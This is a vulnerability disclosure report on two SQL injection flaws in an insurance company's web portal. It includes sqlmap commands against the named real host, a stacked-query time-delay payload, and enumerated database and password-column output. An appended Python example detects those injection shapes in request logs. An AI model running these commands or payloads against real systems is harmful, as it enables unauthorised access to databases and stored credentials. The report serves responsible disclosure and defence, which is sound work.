2015-08-20: Details reported to the vendor, awaiting vendor response
2015-08-20: Vendor confirmed; details disclosed to the vendor only
2015-08-30: Details disclosed to core white hats and domain experts
2015-09-09: Details disclosed to regular white hats
2015-09-19: Details disclosed to intern white hats
2015-10-04: Details disclosed to the public
As in the title.
Two front-end SQL injection points in the Sunshine Insurance Group (sinosig) cloud platform.
1. Injection point 1: the login form:
c:\Python27\sqlmap>sqlmap.py -u "http://ygjrex.sinosig.com/tabid/161/Default.aspx?returnurl=%2fdefault.aspx" --data="u_al=login&u_n=admin&u_p=admin123&u_r=0&_=0.33639599406160414" -p u_n
The u_n parameter is vulnerable to time-based (delay) injection:
POST parameter 'u_n' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 88 HTTP(s) requests:
---
Parameter: u_n (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: u_al=login&u_n=admin';WAITFOR DELAY '0:0:5'--&u_p=admin123&u_r=0&_=0.33639599406160414
---
2. Injection point 2: the password-recovery form:
sqlmap.py -u "http://ygjrex.sinosig.com/http://ygjrex.sinosig.com/tabid/193/Default.aspx" --data="actionType=ecode&[email protected]&surl=http://ygjrex.sinosig.com/?TabId=193" -p email
The email parameter is vulnerable to error-based injection, so data can be extracted quickly.
A small amount of information retrieved through injection point 2. Databases:
available databases [22]:
[*] fcdb
[*] km15b
[*] km_14
[*] km_15
[*] km_bjh
[*] km_gdym
[*] km_lhsz
[*] master
[*] meisizixun
[*] model
[*] msdb
[*] pfps
[*] pfps_cuspro
[*] pfps_customer
[*] pfps_plan
[*] pfpsata
[*] pfpsproduct
[*] tempdb
[*] water_crm
[*] waterh2_py
[*] ygbx
[*] zhongmeizhihui
Tables (221 in total):
Tables found to contain a password-related column:
Table: BRCB_UserMap
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| PassWord | nvarchar |
+----------+----------+

Database: ygbx
Table: vw_Users
[1 column]
+----------------+------+
| Column         | Type |
+----------------+------+
| UpdatePassword | bit  |
+----------------+------+

Database: ygbx
Table: aspnet_Membership
[10 columns]
+----------------------------------------+----------+
| Column                                 | Type     |
+----------------------------------------+----------+
| FailedPasswordAnswerAttemptCount       | int      |
| FailedPasswordAnswerAttemptWindowStart | datetime |
| FailedPasswordAttemptCount             | int      |
| FailedPasswordAttemptWindowStart       | datetime |
| LastPasswordChangedDate                | datetime |
| Password                               | nvarchar |
| PasswordAnswer                         | nvarchar |
| PasswordFormat                         | int      |
| PasswordQuestion                       | nvarchar |
| PasswordSalt                           | nvarchar |
+----------------------------------------+----------+

Database: ygbx
Table: vw_Portals
[1 column]
+-------------------+----------+
| Column            | Type     |
+-------------------+----------+
| ProcessorPassword | nvarchar |
+-------------------+----------+

Database: ygbx
Table: Portals
[1 column]
+-------------------+----------+
| Column            | Type     |
+-------------------+----------+
| ProcessorPassword | nvarchar |
+-------------------+----------+

Database: ygbx
Table: vw_aspnet_MembershipUsers
[8 columns]
+----------------------------------------+----------+
| Column                                 | Type     |
+----------------------------------------+----------+
| FailedPasswordAnswerAttemptCount       | int      |
| FailedPasswordAnswerAttemptWindowStart | datetime |
| FailedPasswordAttemptCount             | int      |
| FailedPasswordAttemptWindowStart       | datetime |
| LastPasswordChangedDate                | datetime |
| PasswordAnswer                         | nvarchar |
| PasswordFormat                         | int      |
| PasswordQuestion                       | nvarchar |
+----------------------------------------+----------+

Database: ygbx
Table: Users
[1 column]
+----------------+------+
| Column         | Type |
+----------------+------+
| UpdatePassword | bit  |
+----------------+------+
No data was dumped. Please fix it on your side.
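An added detection example, not part of the original report: it parses form-encoded POST bodies like the ones above for the stacked-query WAITFOR DELAY shape found in u_n and for a quote break-out like the one in the email parameter, and uses the response time to separate mere injection attempts from requests where the delay actually executed. The endpoint paths follow the report; the log entries, bodies and timings are constructed.

```python
# Added example (not from the report): flag the MSSQL injection shapes seen above.
import re
from urllib.parse import parse_qs

# ';WAITFOR DELAY '0:0:5' -- a stacked query ending in a time-delay primitive
STACKED_DELAY = re.compile(r";\s*WAITFOR\s+DELAY\s+'(\d+):(\d+):(\d+)'", re.IGNORECASE)
# a closing quote immediately followed by an SQL token or statement separator
QUOTE_BREAK = re.compile(r"'\s*(;|--|\bAND\b|\bOR\b|\bWAITFOR\b)", re.IGNORECASE)
def scan_post_body(body):
    """Return {param: reason} for every suspicious parameter in a form body."""
    findings = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            if STACKED_DELAY.search(value):
                findings[name] = "stacked-query time delay"
            elif QUOTE_BREAK.search(value):
                findings[name] = "quote break-out"
    return findings
def delay_seconds(value):
    """Seconds requested by a WAITFOR DELAY 'h:m:s' inside value, 0 if none."""
    m = STACKED_DELAY.search(value)
    if not m:
        return 0
    h, mi, s = (int(x) for x in m.groups())
    return h * 3600 + mi * 60 + s

def classify(body, elapsed_ms):
    """'hit' if a requested delay is reflected in the response time, 'attempt'
    if the body is suspicious but the server did not stall, else 'clean'."""
    findings = scan_post_body(body)
    if not findings:
        return "clean", findings
    values = [v for vs in parse_qs(body, keep_blank_values=True).values() for v in vs]
    requested = max((delay_seconds(v) for v in values), default=0)
    if requested and elapsed_ms >= requested * 1000:
        return "hit", findings
    return "attempt", findings

# Constructed entries (path, body, elapsed_ms): paths follow the report, bodies and
# timings are made up for the demonstration (o'brien shows a legitimate apostrophe).
SAMPLE_LOG = [
    ("/tabid/161/Default.aspx", "u_al=login&u_n=admin&u_p=admin123&u_r=0", 120),
    ("/tabid/161/Default.aspx", "u_al=login&u_n=o'brien&u_p=x&u_r=0", 130),
    ("/tabid/161/Default.aspx", "u_al=login&u_n=admin'%3BWAITFOR+DELAY+'0%3A0%3A5'--&u_p=x&u_r=0", 5210),
    ("/tabid/193/Default.aspx", "actionType=ecode&email=x%40example.com'+AND+1%3D1--&surl=%2F", 140),
]
def scan_log(entries=SAMPLE_LOG):
    """Verdict and findings for each log entry."""
    return [(path, *classify(body, ms)) for path, body, ms in entries]
```

A run of repeated "attempt" verdicts against one endpoint is the sqlmap probing pattern (88 requests here); a single "hit" on the login form is the confirmed injection.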
Severity: Medium
Vulnerability Rank: 5
Confirmed at: 2015-08-20 10:11
Thank you for the submission. This site is not hosted in the company's data center; it was presumably set up independently by a branch department. We are contacting the person in charge.
None yet